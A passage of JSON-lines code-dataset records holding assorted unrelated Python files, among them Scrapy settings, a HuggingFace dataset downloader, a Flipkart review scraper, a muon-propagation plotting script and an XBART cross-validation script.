else item_obj.data\n            )\n            col3 = json.dumps(col3, default=lambda o: \"\", indent=2)\n            table.add_row(\n                [\n                    \"\\nStatus:\" + str_ellipsis(col1, 80),\n                    \"\\nRuntime:\" + str_ellipsis(col2, 60),\n                    \"\\nKey:\" + str_ellipsis(col3, 60),\n                ]\n            )\n\n        table.field_names = [\"Status\", \"Runtime\", \"Key Value\"]\n        table.align = \"l\"\n        tracer.info(\"Explain candidates:\\n%s\", 
str(table))\n","repo_name":"barbu-it/kheops","sub_path":"kheops/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":10985,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70623380330","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for deepin project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'deepin'\n\nSPIDER_MODULES = ['deepin.spiders']\nNEWSPIDER_MODULE = 'deepin.spiders'\n\nDEFAULT_ITEM_CLASS = 'deepin.items.Problem'\n\nITEM_PIPELINES = {\n\t'deepin.pipelines.StoreToMongoDB': 1\n}\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\nUSER_AGENT = 'QSCTech (+http://tech.myqsc.com/)'\n","repo_name":"YuzhongHuangCS/scrapy-bots","sub_path":"deepin/deepin/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"3121469319","text":"\nimport os\n\nd = {'mean': [1,2 ,3, 4, 5, 6, 7], 'std': [1, 2, 3, 4, 5, 6, 7]}\npath_dir = os.path.abspath(os.path.dirname(__file__))\nprint (path_dir)\npkl_dir = path_dir + '/test.pkl'\nprint (pkl_dir)\nimport pickle\nwith open(pkl_dir, 'wb') as f:\n pickle.dump(d, f, pickle.HIGHEST_PROTOCOL)","repo_name":"Taospirit/Light_RL","sub_path":"beta/test/test_pickle.py","file_name":"test_pickle.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24936349696","text":"from collections import deque\n\n\nrows, columns = [int(a) for a in input().split(\" \")]\nmatrix = [[0] * columns for row in range(rows)]\n\nsnake = deque(input())\n\nfor row in range(rows):\n if row % 2 == 0:\n for column in range(columns):\n current_char = snake.popleft()\n matrix[row][column] = current_char\n snake.append(current_char)\n\n else:\n for column in range(columns - 1, -1, -1):\n current_char = snake.popleft()\n matrix[row][column] = current_char\n snake.append(current_char)\n\n[print(\"\".join(line)) for line in matrix]\n\n# Dilyan\n\n# from collections import deque\n#\n# rows, cols = [int(x) for x in input().split()] # cols = 6\n# word = list(input()) # abc => [\"a\", \"b\", \"c\"]\n#\n# word_copy = deque(word)\n#\n# for row in range(rows):\n# while len(word_copy) < cols:\n# word_copy.extend(word)\n#\n# if row % 2 == 0:\n# print(*[word_copy.popleft() for _ in range(cols)], sep=\"\")\n# else:\n# print(*[word_copy.popleft() for _ in range(cols)][::-1], sep=\"\")\n\n","repo_name":"Polishko/SoftUni","sub_path":"Python Advanced Exercises/Multidimensional Lists - 1/snake_moves.py","file_name":"snake_moves.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72268813929","text":"import csv\nfrom kjellar.member import Member, getServer, setServer\n\nasync def csvToPkl(guild, msg, file):\n csvf = open(file, \"rt\")\n reader = csv.reader(csvf)\n\n server = getServer(guild)\n nr = 1 \n for line in reader:\n if line[0] == \"name\":\n continue\n\n for user in guild.members:\n print(line[0])\n print(user.name)\n if line[0] == user.name:\n uid = user.id\n break\n\n server.users[uid] = Member(guild, uid, line[0], int(line[2]), int(line[1]), int(line[3]), int(line[6]), int(line[4]))\n 
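# announce each imported member in the channel\n        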
await msg.channel.send(f\"added {line[0]} to the database.\")\n        nr += 1\n    \n    setServer(server)","repo_name":"haoii15/VirtualLinda_Public","sub_path":"kjellar/csvtopkl.py","file_name":"csvtopkl.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"75072470887","text":"# coding:utf-8\n\nclass Solution(object):\n    def selfDividingNumbers(self,left,right):\n        \"\"\"\n\n        :param left: int\n        :param right: int\n        :return: List[int]\n        \"\"\"\n\n        return list(filter(lambda y:y, map(lambda x:x if all([False if i == '0' else int(x) % int(i) == 0 for i in str(x)]) else False, range(left, right+1))))\n\n\n\ndef main():\n    left = int(input(\"Please input left:\"))\n    right = int(input(\"Please input right:\"))\n\n    test = Solution()\n\n    print(test.selfDividingNumbers(left,right))\n\n\nif __name__ == '__main__' :\n    main()","repo_name":"daisy0x00/LeetCode_Python","sub_path":"LeetCode728/LeetCode728.py","file_name":"LeetCode728.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"11463597787","text":"class Station:\n    def __init__(self, abbr, name, lat, lng, segments, system):\n        self.abbr = abbr\n        self.name = name\n        self.lat = lat\n        self.lng = lng\n        self.segments = segments\n        self.trains = None\n        self.system = system\n\n    def add_containing_segment(self, segment):\n        if not segment in self.segments:\n            assert(segment.n_station == self or segment.s_station == self)\n            self.segments.append(segment)\n\n    def segment_to_station(self, other_station):\n        segment_to_station = None\n        for segment in self.segments:\n            if segment.n_station == other_station or segment.s_station == other_station:\n                segment_to_station = segment\n        return segment_to_station\n\n    def __repr__(self):\n        return \"<Station %s>\" % self.name","repo_name":"aaroncohen/BARTsim","sub_path":"station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"21647859673","text":"import argparse\nimport json\nimport os\nimport tarfile\nimport zipfile\n\nfrom huggingface_hub import hf_hub_download\n\nDATASETS = {\"ai_society\": \"ai_society_chat.tar.gz\", \n            \"code\": \"code_chat.tar.gz\", \n            \"math\": \"math.zip\", \n            \"physics\": \"physics.zip\", \n            \"chemistry\": \"chemistry.zip\", \n            \"biology\": \"biology.zip\",\n            \"sharegpt\": [\"sg_90k_part1.json\", \"sg_90k_part2.json\"],\n            \"alpaca\": \"train-00000-of-00001-a09b74b3ef9c3b56.parquet\"}\n\n# Download datasets\ndef download_hf_dataset(dataset, download_directory):\n    if dataset == \"sharegpt\":\n        for file in DATASETS[dataset]:\n            if os.path.exists(os.path.join(download_directory, \"HTML_cleaned_raw_dataset\", file)):\n                continue\n            hf_hub_download(repo_id=\"anon8231489123/ShareGPT_Vicuna_unfiltered\", repo_type=\"dataset\", filename=file,\n                            subfolder=\"HTML_cleaned_raw_dataset\", local_dir=download_directory, local_dir_use_symlinks=False)\n    elif dataset == \"alpaca\":\n        if os.path.exists(os.path.join(download_directory, \"data\", DATASETS[dataset])):\n            return\n        hf_hub_download(repo_id=\"tatsu-lab/alpaca\", repo_type=\"dataset\", filename=DATASETS[dataset],\n                        subfolder=\"data\", local_dir=download_directory, local_dir_use_symlinks=False)\n    else:\n        if os.path.exists((os.path.join(download_directory, DATASETS[dataset]))):\n            return\n        hf_hub_download(repo_id=f\"camel-ai/{dataset}\", repo_type=\"dataset\", 
filename=DATASETS[dataset],\n                        local_dir=download_directory, local_dir_use_symlinks=False)\n\n# Extract CAMEL datasets and remove compressed files\ndef unzip_datasets(download_directory):\n    print(\"Extracting datasets...\")\n    files = [f for f in os.listdir(download_directory) if os.path.isfile(os.path.join(download_directory, f))]\n    for file in files:\n        file_path = os.path.join(download_directory, file)\n        if tarfile.is_tarfile(file_path):\n            with tarfile.open(file_path) as tar:\n                tar.extractall(os.path.join(\"datasets\", file.split('.')[0]))\n            os.remove(file_path)\n        elif zipfile.is_zipfile(file_path):\n            with zipfile.ZipFile(file_path, 'r') as zip_ref:\n                zip_ref.extractall(os.path.join(\"datasets\", file.split('.')[0]))\n            os.remove(file_path)\n        else: \n            pass\n\ndef download_dataset(dataset, download_directory):\n\n    try:\n        download_hf_dataset(dataset, download_directory)\n    except Exception:\n        print(f\"{dataset} could not be downloaded\")\n\nif __name__ == \"__main__\":\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--datasets\", nargs='+', choices=list(DATASETS.keys())+[\"all\"], type=str)\n    parser.add_argument(\"--download_directory\", type=str, default=\"datasets\")\n\n    args = parser.parse_args()\n\n    if not os.path.exists(args.download_directory):\n        os.makedirs(args.download_directory)\n\n    if args.datasets == [\"all\"]:\n        args.datasets = list(DATASETS.keys())\n    \n    for dataset in args.datasets:\n        download_dataset(dataset, args.download_directory)\n\n    unzip_datasets(args.download_directory)\n","repo_name":"camel-ai/camel_chat","sub_path":"camel_chat/data_preprocessing/download_datasets.py","file_name":"download_datasets.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"}
{"seq_id":"38516717897","text":"n=int(input())\r\nl=list(map(int,input().split()))[:n]\r\np=len(l)//2\r\ng=0\r\nx=l[p:]\r\ny=l[:p]\r\nif (sum(x)//len(x))==(sum(y)//len(y)):\r\n    g=1\r\nif(g==1):\r\n    print(\"yes\")\r\nelse:\r\n    print(\"no\")","repo_name":"shifelfs/shifel","sub_path":"p21.py","file_name":"p21.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"19668299431","text":"#!/usr/bin/env python3\n\n\"\"\"\nDraw some diagnostics plots from an hdf5 file\n\"\"\"\n\nfrom argparse import ArgumentParser\nfrom h5py import File\nfrom ndhist.mpl import Canvas\nimport numpy as np\n\ndef get_args():\n    parser = ArgumentParser(description=__doc__)\n    parser.add_argument('input_file')\n    parser.add_argument('-n', '--nevents', default=100000, type=int)\n    parser.add_argument('-o', '--output-dir', default='plots')\n    return parser.parse_args()\n\ndef run():\n    args = get_args()\n    with File(args.input_file, 'r') as h5file:\n        jets_chunk = h5file['jets'][:args.nevents]\n        # draw_jets(jets_chunk, args.output_dir)\n        if 'tracks' in h5file:\n            tracks_chunk = h5file['tracks'][:args.nevents]\n            draw_tracks(tracks_chunk, jets_chunk, args.output_dir)\n\nsig_color = (1, 0, 0, 0.5)\nbg_color = (0, 0, 1, 0.5)\n\ndef add_nan_count(ax, count_sig, count_bg):\n    ax.text(0.9,0.9, f'NaNs, sig: {count_sig}, bg: {count_bg}',\n            va='top', ha='right',\n            transform=ax.transAxes)\n\ndef draw_tracks(tracks_chunk, jets_chunk, out_dir):\n    signal_idx = (jets_chunk['LabDr_HadF'] == 5)\n    bg_idx = (jets_chunk['LabDr_HadF'] == 0)\n    n_masked = np.count_nonzero(tracks_chunk['mask'], axis=1)\n    n_tracks = tracks_chunk.shape[1] - n_masked\n    count_bins = np.arange(-0.5, 20.5, 1)\n    with 
Canvas(f'{out_dir}/n_tracks.pdf') as can:\n        can.ax.hist(n_tracks[signal_idx], color=sig_color, bins=count_bins)\n        can.ax.hist(n_tracks[bg_idx], color=bg_color, bins=count_bins)\n\n    d0sig_bins = np.linspace(-50, 75, 40)\n    leading_track_d0 = tracks_chunk['d0sig_ls'][:,0]\n    valid_leading = ~tracks_chunk['mask'][:,0]\n    with Canvas(f'{out_dir}/leading_track_d0sig.pdf') as can:\n        can.ax.hist(leading_track_d0[valid_leading & signal_idx],\n                    color=sig_color, label='bottom', bins=d0sig_bins)\n        can.ax.hist(leading_track_d0[valid_leading & bg_idx],\n                    color=bg_color, label='light', bins=d0sig_bins)\n        can.ax.legend()\n        can.ax.set_yscale('log')\n\n    valid_sig_track = ~tracks_chunk['mask'] & signal_idx[:,None]\n    valid_bg_track = ~tracks_chunk['mask'] & bg_idx[:,None]\n    signal_d0sig = tracks_chunk['d0sig_ls'][valid_sig_track]\n    bg_d0sig = tracks_chunk['d0sig_ls'][valid_bg_track]\n    with Canvas(f'{out_dir}/track_d0sig.pdf') as can:\n        can.ax.hist(signal_d0sig,\n                    color=sig_color, label='bottom', bins=d0sig_bins)\n        can.ax.hist(bg_d0sig,\n                    color=bg_color, label='light', bins=d0sig_bins)\n        can.ax.legend()\n        can.ax.set_yscale('log')\n\ndef draw_jets(jets_chunk, out_dir):\n    signal_idx = (jets_chunk['LabDr_HadF'] == 5)\n    bg_idx = (jets_chunk['LabDr_HadF'] == 0)\n    signal = jets_chunk[signal_idx]\n    bg = jets_chunk[bg_idx]\n    for var in jets_chunk.dtype.names:\n        with Canvas(f'{out_dir}/{var}.pdf') as can:\n            def get_good(vals):\n                good = ~np.isnan(vals[var])\n                return vals[var][good]\n            def count_nan(vals):\n                return np.isnan(vals[var]).sum()\n            can.ax.hist(get_good(signal), color=sig_color)\n            can.ax.hist(get_good(bg), color=bg_color)\n            can.ax.set_xlabel(var, x=0.98, ha='right', size=12)\n            sig_nan, bg_nan = count_nan(signal), count_nan(bg)\n            add_nan_count(can.ax, sig_nan, bg_nan)\n\nif __name__ == '__main__':\n    run()\n","repo_name":"dguest/btag2text","sub_path":"scripts/btag-draw-from-hdf5.py","file_name":"btag-draw-from-hdf5.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"41971753966","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom bs4 import BeautifulSoup as bs\n\n\n# In[3]:\n\n\nimport requests\n\n\n# In[4]:\n\n\nlink=\"https://www.flipkart.com/google-pixel-7-snow-128-gb/p/itm45d75002be0e7?pid=MOBGHW44PRZ8WP2M&lid=LSTMOBGHW44PRZ8WP2MEGIXNO&marketplace=FLIPKART&store=tyy%2F4io&srno=b_1_3&otracker=hp_bannerads_1_2.bannerAdCard.BANNERADS_Cat-Mob-HPW2-Pixel%2B7-_OI204387L9YV&fm=neo%2Fmerchandising&iid=b72a85a6-eaf9-476e-adad-fb9bf1c7acf0.MOBGHW44PRZ8WP2M.SEARCH&ppt=hp&ppn=homepage&ssid=6512vadlsg0000001669195963995\"\n\n\n# In[5]:\n\n\npage=requests.get(link)\n\n\n# In[7]:\n\n\npage\n\n\n# In[11]:\n\n\npage.content\n\n\n# In[13]:\n\n\nsoup=bs(page.content,\"html.parser\")\nsoup\n\n\n# In[15]:\n\n\nprint(soup.prettify())\n\n\n# # Title of the Product\n\n# In[17]:\n\n\ntitle=soup.title\n\n\n# In[19]:\n\n\nprint(soup.title)\n\n\n# In[21]:\n\n\nprint(type(soup))\n\n\n# In[23]:\n\n\nprint(title.string)\n\n\n# # Check Product Price\n\n# In[27]:\n\n\nprice=soup.find_all(\"div\",class_=\"_30jeq3 _16Jk6d\")\n\n\n# In[29]:\n\n\nprice\n\n\n# In[32]:\n\n\nproduct_price=[]\n\nfor i in range(0,len(price)):\n    product_price.append(price[i].get_text())\n\n\n# In[34]:\n\n\nproduct_price\n\n\n# In[36]:\n\n\nprice[i].get_text()\n\n\n# # Scrape Customer Names\n\n# In[38]:\n\n\nnames=soup.find_all(\"p\",class_=\"_2sc7ZR _2V5EHH\")\nnames\n\n\n# 
In[40]:\n\n\ncust_name=[]\n\nfor i in range(0,len(names)):\n    cust_name.append(names[i].get_text())\n\n\n# In[42]:\n\n\ncust_name\n\n\n# In[50]:\n\n\nfor i in range(0,len(cust_name)):\n    print(cust_name[i])\n\n\n# # Scrape Reviews\n\n# In[52]:\n\n\nreview=soup.find_all(\"p\",class_=\"_2-N8zT\")\nreview\n\n\n# In[54]:\n\n\ncust_rev=[]\n\nfor i in range(0,len(review)):\n    cust_rev.append(review[i].get_text())\n\n\n# In[56]:\n\n\ncust_rev\n\n\n# In[58]:\n\n\nfor i in range(0,len(cust_rev)):\n    print(cust_rev[i])\n\n\n# # Scrape Comments\n\n# In[61]:\n\n\ncomment=soup.find_all(\"div\",class_=\"t-ZTKy\")\ncomment\n\n\n# In[62]:\n\n\ncust_comment=[]\n\n\nfor i in range(0,len(comment)):\n    cust_comment.append(comment[i].get_text())\n\n\n# In[64]:\n\n\ncust_comment\n\n\n# In[66]:\n\n\nfor i in range(0,len(cust_comment)):\n    print(cust_comment[i])\n\n\n# # Scrape Rating\n\n# In[67]:\n\n\nrating=soup.find_all(\"div\",class_=\"_3LWZlK _1BLPMq\")\nrating\n\n\n# In[68]:\n\n\ncust_rating=[]\n\nfor i in range(0,len(rating)):\n    cust_rating.append(rating[i].get_text())\n\n\n# In[70]:\n\n\ncust_rating\n\n\n# In[73]:\n\n\nfor i in range(0,len(cust_rating)):\n    print(cust_rating[i])\n\n\n# In[74]:\n\n\nimport pandas as pd\n\n\n# In[75]:\n\n\ndf=pd.DataFrame()\n\ndf[\"Customer Names\"]=cust_name\ndf[\"Customer Review\"]=cust_rev\ndf[\"Customer Comment\"]=cust_comment\ndf[\"Ratings\"]=cust_rating\n\n\n# In[79]:\n\n\ndf\n\n","repo_name":"siddhantjangam/flipkart-webscrapping","sub_path":"flipkart webscrapping.py","file_name":"flipkart webscrapping.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"29032560692","text":"import sys\nimport pyPROPOSAL\nimport math\nimport time\nimport datetime\nimport os\n\nfrom matplotlibconfig import *\n\nfrom decimal import Decimal\n\ntry:\n    import matplotlib\n    matplotlib.use(\"Agg\")\n\n    import matplotlib.pyplot as plt\n    from matplotlib.colors import LogNorm\n    from mpl_toolkits.axes_grid1 import make_axes_locatable\n\nexcept ImportError:\n    print(\"Matplotlib not installed!\")\n\nimport numpy as np\n# np.set_printoptions(threshold='nan')\n\n\nclass ProgressBar(object):\n\n    def __init__(self, loops, bar_lenght=50, start=0, **keywords):\n\n        self._bar_lenght = bar_lenght\n        self._bar = []\n        self._loops = loops\n        self._start = float(start)\n        self._current_loop = start\n\n        self._started_process = False\n        self._start_time = None\n\n        self._pacman = False\n\n        self._status = \"\"\n        self._text = \"\\rPercent: [{0}] {1}% Time: {2} Iteration: {3}/{4} {5}\"\n\n        self._bar_full = \"=\"\n        self._bar_empty = \" \"\n\n        for key, value in keywords.items():\n            if key == \"pacman\":\n                assert type(value) is bool\n                self._pacman = value\n\n        if self._pacman:\n            self._bar_full = \"-\"\n            self._bar_empty = \"o\"\n\n            current = self._bar_empty\n            for i in range(self._bar_lenght):\n                if current == self._bar_empty:\n                    current = \" \"\n                    self._bar.append(current)\n                else:\n                    current = self._bar_empty\n                    self._bar.append(current)\n        else:\n            for i in range(self._bar_lenght):\n                self._bar.append(self._bar_empty)\n\n        self._current_pac_state = \"C\"\n        self._current_pac_block = 0\n\n    def reset(self):\n        self._current_loop = self._start\n        self._status = \"\"\n        self._started_process = False\n\n    def start(self):\n        self._started_process = True\n        self._start_time = time.time()\n\n    def update(self):\n        if self._started_process is False:\n            print(\"Please start ProgressBar before updating it!\")\n            return\n\n        self._current_loop += 1.0\n        progress = self._current_loop / self._loops\n\n        if progress >= 1.0:\n            self._status = \"Done...\\n\"\n\n        if self._pacman:\n            block = int((self._bar_lenght - 1) * progress)\n\n            if self._current_pac_block < block:\n                self._current_pac_block = block\n                if self._current_pac_state == \"c\":\n                    self._current_pac_state = \"C\"\n                else:\n                    self._current_pac_state = \"c\"\n            else:\n                pass\n\n            self._bar[block] = '\\033[1m' + \"\\033[93m\" + \\\n                self._current_pac_state + '\\033[0m'\n            self._bar[:block] = block * [self._bar_full]\n        else:\n            block = int(self._bar_lenght * progress)\n            self._bar[:block] = block * [self._bar_full]\n\n        text = self._text.format(\n            \"\".join(self._bar),\n            progress*100,\n            str(datetime.timedelta(seconds=(time.time() - self._start_time))),\n            int(self._current_loop),\n            self._loops,\n            self._status\n        )\n\n        sys.stdout.write(text)\n        sys.stdout.flush()\n\n\ndef save_number_to_tex(number, filename):\n    text_file = open(filename, \"w\")\n    text_file.write(number)\n    text_file.close()\n\ndef plot_hist(ax, prim, sec, label):\n\n    x_space = np.logspace( 2, 14, 100)\n    y_space = np.logspace( -2, 14, 100)\n\n    hist = ax.hist2d(prim, sec, bins=(x_space, y_space), norm=LogNorm())\n\n    textstr = label\n    \n    props = dict(facecolor='white', alpha=0.8, edgecolor='none')\n    ax.text(0.1, 0.9, textstr,\n            verticalalignment='top', horizontalalignment='left',\n            transform=ax.transAxes, fontsize=font_size, bbox=props)\n\n    ax.set_xscale(\"log\", nonposx='clip')\n    ax.set_yscale(\"log\", nonposy='clip')\n\n    ax.grid(grid_conf)\n\n    count = sum([sum(x) for x in hist[0]])\n    esum = sum(sec)\n\n    return (ax, hist, count, esum)\n\nif __name__ == \"__main__\":\n\n    import sys\n\n    # =========================================================\n    # \tCommandline args\n    # =========================================================\n\n    statistics = int(5e3)\n    config_file = \"resources/config_ice.json\"\n\n    if len(sys.argv) == 2:\n        statistics = int(sys.argv[1])\n    elif len(sys.argv) == 3:\n        statistics = int(sys.argv[1])\n        config_file = sys.argv[2]\n\n    # =========================================================\n    # PROPOSAL\n    # =========================================================\n\n    prop = pyPROPOSAL.Propagator(\n        particle_def=pyPROPOSAL.particle.MuMinusDef.get(),\n        config_file=config_file\n    )\n\n    mu = prop.particle\n\n    E_max_log = 14\n\n    epair_primary_energy = []\n    epair_secondary_energy = []\n\n    brems_primary_energy = []\n    brems_secondary_energy = []\n\n    ioniz_primary_energy = []\n    ioniz_secondary_energy = []\n\n    photo_primary_energy = []\n    photo_secondary_energy = []\n\n    length = []\n    n_secondarys = []\n\n    progress = ProgressBar(statistics, pacman=True)\n    progress.start()\n\n    for i in range(statistics):\n        progress.update()\n\n        mu.position = pyPROPOSAL.Vector3D(0, 0, 0)\n        mu.direction = pyPROPOSAL.Vector3D(0, 0, -1)\n        mu.energy = math.pow(10, E_max_log)\n        mu.propagated_distance = 0\n\n        secondarys = prop.propagate()\n\n        length.append(mu.propagated_distance / 100)\n        n_secondarys.append(len(secondarys))\n\n        for sec in secondarys:\n            sec_energy = sec.energy\n            energy = sec.parent_particle_energy\n\n            if sec.id == pyPROPOSAL.particle.Data.Epair:\n                epair_primary_energy.append(energy)\n                epair_secondary_energy.append(sec_energy)\n            if sec.id == pyPROPOSAL.particle.Data.Brems:\n                brems_primary_energy.append(energy)\n                brems_secondary_energy.append(sec_energy)\n            if sec.id == pyPROPOSAL.particle.Data.DeltaE:\n                ioniz_primary_energy.append(energy)\n                ioniz_secondary_energy.append(sec_energy)\n            if sec.id == pyPROPOSAL.particle.Data.NuclInt:\n                
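# photonuclear interactions are collected in the photo_* lists\n                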
photo_primary_energy.append(energy)\n photo_secondary_energy.append(sec_energy)\n\n # =========================================================\n # Plot\n # =========================================================\n\n plt.rcParams.update(params)\n\n\n fig, axes = plt.subplots(nrows=2, ncols=2, \n figsize=(width , 0.7*width), sharex=True, sharey=True\n )\n\n hists = []\n counts = []\n esums = []\n primary_energies = [epair_primary_energy, brems_primary_energy, photo_primary_energy, ioniz_primary_energy]\n secondary_energies = [epair_secondary_energy, brems_secondary_energy, photo_secondary_energy, ioniz_secondary_energy]\n labels = [r'$e$ pair production', \"Bremsstrahlung\", \"Photonuclear\", \"Ionization\"]\n short_labels = ['epair', 'brems', 'photo', 'ioniz']\n\n for ax, primary_energy, secondary_energy, label in zip(axes.flat, primary_energies, secondary_energies, labels):\n \tax, hist_tmp, count, esum = plot_hist(ax, primary_energy, secondary_energy, label)\n \thists.append(hist_tmp[3])\n \tcounts.append(count)\n \tesums.append(esum)\n fig.tight_layout(rect=(0.02, 0.02, 1, 1)) # rect = (0,0,1,1) is the default option\n\n fig.subplots_adjust(wspace=0.15, hspace=0.1, right=0.88)\n cbar_ax = fig.add_axes([0.91, 0.15, 0.03, 0.7])\n fig.colorbar(hists[3], cax=cbar_ax)\n\n fig.add_subplot(111, frameon=False)\n # hide tick and tick label of the big axis\n plt.tick_params(labelcolor='none', top=False, bottom=False, left=False, right=False)\n plt.xlabel(r'$ E_{\\textrm{primary}}\\,/\\, \\mathrm{MeV} $')\n plt.ylabel(r'$ E_{\\textrm{primary}} \\cdot v \\,/\\, \\mathrm{MeV} $', labelpad=10)\n\n fig.savefig(\"build/secondary_number.pdf\",bbox_inches='tight')\n\n # Save stuff\n\n for count, esum, label in zip(counts, esums, short_labels):\n print(label + \":\")\n\n print(\"Counts:\")\n tmp = '%.2E' % Decimal(count)\n print(tmp)\n save_number_to_tex(tmp, 'build/numbers/' + label + '_count.tex')\n\n print(\"E_sum:\")\n tmp = '%.2E' % Decimal(esum)\n print(tmp)\n save_number_to_tex(tmp, 'build/numbers/' + label + '_esum.tex')\n\n\n","repo_name":"Jean1995/Masterarbeit","sub_path":"Plots/secondary_number.py","file_name":"secondary_number.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10538189362","text":"import numpy as np\nimport pandas as pd\nimport datetime\nimport gc\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import StratifiedKFold,KFold\nfrom sklearn.metrics import mean_squared_error,log_loss\nfrom collections import OrderedDict\nimport warnings\nwarnings.filterwarnings('ignore')\nnp.random.seed(4590)\n\nfrom XBART import XBART\n\nprint(\"Reading Data...\")\npath = \"/Users/saaryalov/Kaggle/ELO/saar_model/Data_2/\"\n\n# df_train = pd.read_csv( path+ 'train_ok2_xbart_4.csv')\n# df_test = pd.read_csv(path+ 'test_ok2_xbart_4.csv')\n\ndf_train = pd.read_csv( path+ 'train_ok2_xbart_norm_1.csv')\ndf_test = pd.read_csv(path+ 'test_ok2_xbart_norm_1.csv')\n\nprint(df_train.shape)\nprint(df_test.shape)\n\n\nprint('Preprocess...')\ntarget = df_train['target']\ndel df_train['target']; \n\nprint(target.shape)\n#del df_train['Unnamed: 0']; del df_test['Unnamed: 0'];\nfeatures = [c for c in df_train.columns if c not in ['card_id', 'first_active_month','outliers']]\ncont = 
[\"new_hist_purchase_amount_var\",\n\"new_hist_purchase_amount_mean\",\n\"hist_month_lag_var\",\n\"new_hist_purchase_date_max\",\n\"hist_purchase_date_max\",\n\"hist_purchase_date_min\",\n\"hist_purchase_amount_sum\",\n\"hist_purchase_amount_var\",\n\"hist_purchase_amount_mean\" ]\n\ncat= ['new_hist_purchase_date_uptonow',\n 'hist_month_diff_mean',\n 'hist_category_1_sum',\n 'new_hist_category_1_sum',\n 'new_hist_purchase_amount_max',\n 'hist_merchant_id_nunique',\n 'new_hist_month_lag_mean',\n 'elapsed_time',\n 'new_hist_installments_mean',\n 'new_hist_month_diff_mean',\n 'hist_category_1_mean',\n 'new_hist_card_id_size',\n 'new_hist_purchase_date_diff',\n 'hist_purchase_date_uptonow',\n 'hist_month_nunique',\n 'hist_authorized_flag_mean',\n 'feature_1',\n 'hist_installments_sum',\n 'new_hist_merchant_category_id_nunique',\n 'hist_first_buy',\n 'hist_month_lag_mean',\n 'hist_purchase_amount_min',\n 'hist_category_3_mean_mean',\n 'hist_weekofyear_nunique',\n 'hist_purchase_date_average',\n 'new_hist_purchase_date_average',\n 'hist_subsector_id_nunique',\n 'new_hist_purchase_amount_min',\n 'new_hist_month_lag_var',\n 'new_hist_installments_var',\n 'hist_installments_mean',\n 'hist_purchase_date_diff',\n 'hist_category_2_mean_mean',\n 'new_hist_category_3_mean_mean',\n 'hist_merchant_category_id_nunique']\nfeatures = cont+ cat\n\nprint(features)\nprint(\"Define XBART Model\")\nm = 20\ntau = .67*np.var(target)/m\nparams = OrderedDict([('M',m),('L',1),(\"N_sweeps\",250)\n\t\t\t\t\t\t\t,(\"Nmin\",1),(\"Ncutpoints\",30)\n\t\t\t\t\t\t\t,(\"alpha\",0.95),(\"beta\",1.75),(\"tau\",tau),\n\t\t\t\t\t\t\t(\"burnin\",15),(\"mtry\",8),(\"max_depth_num\",30),\n\t\t\t\t\t\t\t(\"draw_sigma\",False),(\"kap\",16),(\"s\",4),(\"verbose\",True),\n\t\t\t\t\t\t\t(\"m_update_sigma\",False),(\"parallel\",False)])\n\n\n\nprint(\"CV\")\nfolds = KFold(n_splits=5, shuffle=True, random_state=2333)\noof = np.zeros(len(df_train))\npredictions = np.zeros(len(df_test))\n\n\nxbart = XBART(params)\n# xbart.fit_2d_all(df_train[features].values,target.values,len(cat))\n# predictions += xbart.predict_2d_all(df_test[features].values)[:,params[\"burnin\"]:].mean(axis=1)\nfor fold_, (trn_idx, val_idx) in enumerate(folds.split(df_train)):\n print(\"fold {}\".format(fold_))\n # trn_data = df_train.iloc[trn_idx][features], label=target.iloc[trn_idx])#, categorical_feature=categorical_feats)\n # val_data = lgb.Dataset(df_train.iloc[val_idx][features], label=target.iloc[val_idx])#, categorical_feature=categorical_feats)\n print(\"Fitting\")\n xbart.fit_2d_all(df_train.iloc[trn_idx][features].values,target.iloc[trn_idx].values,0)\n\n print(\"Get train\")\n y_pred_train = xbart.predict_2d_all(df_train.iloc[trn_idx][features].values)[:,params[\"burnin\"]:].mean(axis=1)\n print(\"Fold {} has score: {:<8.5f}\".format(fold_,mean_squared_error(y_pred_train, target.iloc[trn_idx].values)**0.5))\n\n print(\"Pred oof\")\n y_pred_oof = xbart.predict_2d_all(df_train.iloc[val_idx][features].values)[:,params[\"burnin\"]:].mean(axis=1)\n print(\"Fold {} has score: {:<8.5f}\".format(fold_,mean_squared_error(y_pred_oof, target.iloc[val_idx].values)**0.5))\n oof[val_idx] = y_pred_oof/folds.n_splits\n print(\"Pred test\")\n predictions += xbart.predict_2d_all(df_test[features].values)[:,params[\"burnin\"]:].mean(axis=1)/ folds.n_splits\n\npredictions_df = 